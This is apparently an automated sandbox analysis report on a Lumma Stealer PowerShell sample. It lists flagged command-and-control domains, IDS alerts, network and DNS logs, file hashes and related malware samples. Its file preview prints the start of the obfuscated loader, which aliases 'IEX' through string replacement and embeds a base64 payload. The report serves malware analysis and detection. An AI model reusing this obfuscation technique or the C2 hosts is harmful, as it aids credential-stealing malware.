                                                                                              https://recaptcha.netRegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://store.steampowered.com/RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=I8QM230l1pb_&aRegSvcs.exe, 00000004.00000002.2195309528.0000000001458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://sketchfab.comRegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://lv.queniujq.cnRegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.youtube.com/RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://127.0.0.1:27060RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2184375332.000001B52CCD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://steamcommunity.com/ofRegSvcs.exe, 00000004.00000002.2196147151.00000000014A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://washyceehsu.lat:443/apiRegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                http://crl.mpowershell.exe, 00000000.00000002.2208119243.000001B544BE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/recaptcha/RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://checkout.steampowered.com/RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://help.steampowered.com/RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://api.steampowered.com/RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.2184375332.000001B52CAB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://steamcommunity.com/RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://savorraiykj.lat:443/apisqRegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://oneget.orgpowershell.exe, 00000000.00000002.2184375332.000001B52E351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://store.steampowered.com/;RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs
                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  104.102.49.254
                                                                                                                                  steamcommunity.comUnited States
                                                                                                                                  16625AKAMAI-ASUSfalse
                                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                                  Analysis ID:1591629
                                                                                                                                  Start date and time:2025-01-15 08:23:11 +01:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 3m 1s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:5
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:92.255.57_1.112.ps1
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal96.troj.evad.winPS1@6/5@10/1
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 76%
                                                                                                                                  • Number of executed functions: 18
                                                                                                                                  • Number of non-executed functions: 65
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .ps1
                                                                                                                                  • Stop behavior analysis, all processes terminated
                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45
                                                                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 6012 because it is empty
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  TimeTypeDescription
                                                                                                                                  02:24:09API Interceptor7x Sleep call for process: powershell.exe modified
                                                                                                                                  02:24:09API Interceptor2x Sleep call for process: RegSvcs.exe modified
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                  • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                  http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                  • www.valvesoftware.com/legal.htm
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  steamcommunity.comhttps://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  lumma1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  yTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  G7T8lHJWWM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  uo9m.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 23.197.127.21
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  AKAMAI-ASUSmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 23.54.60.125
                                                                                                                                  EXTERNAL Your company's credit limit has changed!.msgGet hashmaliciousUnknownBrowse
                                                                                                                                  • 184.28.89.29
                                                                                                                                  https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  https://www.giselabravo.com/lblogin/loginsGet hashmaliciousUnknownBrowse
                                                                                                                                  • 104.102.53.18
                                                                                                                                  Eastern Contractors Corporation Contract and submittal document.emlGet hashmaliciousUnknownBrowse
                                                                                                                                  • 2.19.126.97
                                                                                                                                  download.exeGet hashmaliciousBabuk, MimikatzBrowse
                                                                                                                                  • 173.222.162.32
                                                                                                                                  mlfk8sYaiy.dllGet hashmaliciousWannacryBrowse
                                                                                                                                  • 172.230.50.2
                                                                                                                                  XML-702.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                  • 2.23.77.188
                                                                                                                                  EFT_Payment_Notification_Gheenirrigation.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                  • 2.19.126.89
                                                                                                                                  MissedCall_Record_3295935663.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                  • 2.19.126.85
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e12834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  87.247.158.212.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  lumma_phothockey.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  mWAik6b.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  lumma1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 104.102.49.254
                                                                                                                                  No context
                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):64
                                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                                                                                                  MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                                                                                                  SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                                                                                                  SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                                                                                                  SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                  Preview:@...e................................................@..........
                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):6224
                                                                                                                                  Entropy (8bit):3.7276329863291995
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:V6DUlVtTY3CyuU2UD4ukvhkvklCywjEOoclHJASogZoDkOocluASogZoP1:8UY3CQTVkvhkvCCtYOocpH7OocEHE
                                                                                                                                  MD5:E081FAD6F2382AC8F9163094AD06B706
                                                                                                                                  SHA1:2867DB3B7AFAC24C7219EFCF01FBDC3B2C83C9E4
                                                                                                                                  SHA-256:FE7BA4BFB7D8721EA990E50CE71E7B0B2ECF4C07C85628CA3EC45DC36D5F6046
                                                                                                                                  SHA-512:61D10ABC112924150D4ABA5E2F972721A9006369C1304999B487EF74CA03117C7E4037481E973F8ADD1038A9B3EBB5334F611B52A032277CAF4EB22DBCFE4CDD
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:...................................FL..................F.".. ...J.S...cHJv.g..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....-.q.g..V.Xv.g......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2/Z.;...........................^.A.p.p.D.a.t.a...B.V.1...../Z.;..Roaming.@......EW<2/Z.;..../.....................j.D.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2/Z.:....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2/Z.:....2......................Q..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2/Z.:....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2/Z.:....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2/Z.;....u...........
                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):6224
                                                                                                                                  Entropy (8bit):3.7276329863291995
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:V6DUlVtTY3CyuU2UD4ukvhkvklCywjEOoclHJASogZoDkOocluASogZoP1:8UY3CQTVkvhkvCCtYOocpH7OocEHE
                                                                                                                                  MD5:E081FAD6F2382AC8F9163094AD06B706
                                                                                                                                  SHA1:2867DB3B7AFAC24C7219EFCF01FBDC3B2C83C9E4
                                                                                                                                  SHA-256:FE7BA4BFB7D8721EA990E50CE71E7B0B2ECF4C07C85628CA3EC45DC36D5F6046
                                                                                                                                  SHA-512:61D10ABC112924150D4ABA5E2F972721A9006369C1304999B487EF74CA03117C7E4037481E973F8ADD1038A9B3EBB5334F611B52A032277CAF4EB22DBCFE4CDD
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:...................................FL..................F.".. ...J.S...cHJv.g..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....-.q.g..V.Xv.g......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2/Z.;...........................^.A.p.p.D.a.t.a...B.V.1...../Z.;..Roaming.@......EW<2/Z.;..../.....................j.D.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2/Z.:....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2/Z.:....2......................Q..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2/Z.:....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2/Z.:....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2/Z.;....u...........
                                                                                                                                  File type:ASCII text, with very long lines (65478), with CRLF line terminators
                                                                                                                                  Entropy (8bit):5.488650996530884
                                                                                                                                  TrID:
                                                                                                                                    File name:92.255.57_1.112.ps1
                                                                                                                                    File size:538'502 bytes
                                                                                                                                    MD5:123f90955530fdab49599f6bb8d40980
                                                                                                                                    SHA1:e0f3a15f086a3daab49242376dcd5c76a3888d20
                                                                                                                                    SHA256:b404ee84e4b5100561bc108c58aedc06cae277cd220067dce59a3c1cc93a3ac1
                                                                                                                                    SHA512:60fa69568b174816742aacd9301a6cd75c82408474f6ef0a489fd5046658ac10462463263f3f5a7f9a2b8a27eee8685519527596ffd3afc05cb07209620a8704
                                                                                                                                    SSDEEP:6144:eVe/8jH/fkbaAiHnVExoyZYwOiY1LBSUkf2jFgdIVgMbJN+5PVu1Zhn6w/lAVigH:eFwoW2h7dVI42CoeUJ2z6m20sFqwgY
                                                                                                                                    TLSH:07B47D3240537C5F3B9A2ECEA4006EC00C5839A77618D154AE899276F2FD53B9E6D9FC
                                                                                                                                    File Content Preview:.. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAA
                                                                                                                                    Icon Hash:3270d6baae77db44
                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                    2025-01-15T08:24:11.117197+01002059221ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curtainykeo .lat)1192.168.2.6566701.1.1.153UDP
                                                                                                                                    2025-01-15T08:24:11.148193+01002059189ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)1192.168.2.6644061.1.1.153UDP
                                                                                                                                    2025-01-15T08:24:11.165181+01002059211ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)1192.168.2.6635121.1.1.153UDP
                                                                                                                                    2025-01-15T08:24:11.176897+01002059201ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)1192.168.2.6543161.1.1.153UDP
                                                                                                                                    2025-01-15T08:24:11.197153+01002059203ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)1192.168.2.6495521.1.1.153UDP
                                                                                                                                    2025-01-15T08:24:11.207515+01002059199ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)1192.168.2.6644371.1.1.153UDP
                                                                                                                                    2025-01-15T08:24:11.217892+01002059207ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)1192.168.2.6522131.1.1.153UDP
                                                                                                                                    2025-01-15T08:24:11.228308+01002059209ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)1192.168.2.6499671.1.1.153UDP
                                                                                                                                    2025-01-15T08:24:11.238963+01002059191ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)1192.168.2.6576921.1.1.153UDP
                                                                                                                                    2025-01-15T08:24:11.904199+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710104.102.49.254443TCP
                                                                                                                                    2025-01-15T08:24:12.397348+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.649710104.102.49.254443TCP
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Jan 15, 2025 08:24:11.268663883 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:11.268717051 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.268817902 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:11.273411036 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:11.273437977 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.904098034 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.904198885 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:11.907267094 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:11.907280922 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.907489061 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.954021931 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:11.995342970 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:12.397358894 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:12.397382975 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:12.397412062 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:12.397419930 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:12.397447109 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:12.397452116 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:12.397460938 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:12.397598982 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:12.397598982 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:12.481715918 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:12.481761932 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:12.481812000 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:12.481841087 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:12.481841087 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:12.481935978 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:12.484244108 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:12.484244108 CET49710443192.168.2.6104.102.49.254
                                                                                                                                    Jan 15, 2025 08:24:12.484266043 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:12.484273911 CET44349710104.102.49.254192.168.2.6
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Jan 15, 2025 08:24:11.117197037 CET5667053192.168.2.61.1.1.1
                                                                                                                                    Jan 15, 2025 08:24:11.130006075 CET53566701.1.1.1192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.148192883 CET6440653192.168.2.61.1.1.1
                                                                                                                                    Jan 15, 2025 08:24:11.160950899 CET53644061.1.1.1192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.165180922 CET6351253192.168.2.61.1.1.1
                                                                                                                                    Jan 15, 2025 08:24:11.174475908 CET53635121.1.1.1192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.176897049 CET5431653192.168.2.61.1.1.1
                                                                                                                                    Jan 15, 2025 08:24:11.192967892 CET53543161.1.1.1192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.197153091 CET4955253192.168.2.61.1.1.1
                                                                                                                                    Jan 15, 2025 08:24:11.205902100 CET53495521.1.1.1192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.207515001 CET6443753192.168.2.61.1.1.1
                                                                                                                                    Jan 15, 2025 08:24:11.216372967 CET53644371.1.1.1192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.217891932 CET5221353192.168.2.61.1.1.1
                                                                                                                                    Jan 15, 2025 08:24:11.226459980 CET53522131.1.1.1192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.228307962 CET4996753192.168.2.61.1.1.1
                                                                                                                                    Jan 15, 2025 08:24:11.236792088 CET53499671.1.1.1192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.238962889 CET5769253192.168.2.61.1.1.1
                                                                                                                                    Jan 15, 2025 08:24:11.249438047 CET53576921.1.1.1192.168.2.6
                                                                                                                                    Jan 15, 2025 08:24:11.255737066 CET6551953192.168.2.61.1.1.1
                                                                                                                                    Jan 15, 2025 08:24:11.262808084 CET53655191.1.1.1192.168.2.6
                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Jan 15, 2025 08:24:11.117197037 CET192.168.2.61.1.1.10x8a6bStandard query (0)curtainykeo.latA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.148192883 CET192.168.2.61.1.1.10xaabdStandard query (0)bloodyswif.latA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.165180922 CET192.168.2.61.1.1.10x240aStandard query (0)washyceehsu.latA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.176897049 CET192.168.2.61.1.1.10x7585Standard query (0)leggelatez.latA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.197153091 CET192.168.2.61.1.1.10xb4d3Standard query (0)miniatureyu.latA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.207515001 CET192.168.2.61.1.1.10x714Standard query (0)kickykiduz.latA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.217891932 CET192.168.2.61.1.1.10x39aStandard query (0)savorraiykj.latA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.228307962 CET192.168.2.61.1.1.10x8da7Standard query (0)shoefeatthe.latA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.238962889 CET192.168.2.61.1.1.10x9168Standard query (0)finickypwk.latA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.255737066 CET192.168.2.61.1.1.10xda33Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Jan 15, 2025 08:24:11.130006075 CET1.1.1.1192.168.2.60x8a6bName error (3)curtainykeo.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.160950899 CET1.1.1.1192.168.2.60xaabdName error (3)bloodyswif.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.174475908 CET1.1.1.1192.168.2.60x240aName error (3)washyceehsu.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.192967892 CET1.1.1.1192.168.2.60x7585Name error (3)leggelatez.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.205902100 CET1.1.1.1192.168.2.60xb4d3Name error (3)miniatureyu.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.216372967 CET1.1.1.1192.168.2.60x714Name error (3)kickykiduz.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.226459980 CET1.1.1.1192.168.2.60x39aName error (3)savorraiykj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.236792088 CET1.1.1.1192.168.2.60x8da7Name error (3)shoefeatthe.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.249438047 CET1.1.1.1192.168.2.60x9168Name error (3)finickypwk.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Jan 15, 2025 08:24:11.262808084 CET1.1.1.1192.168.2.60xda33No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                    • steamcommunity.com
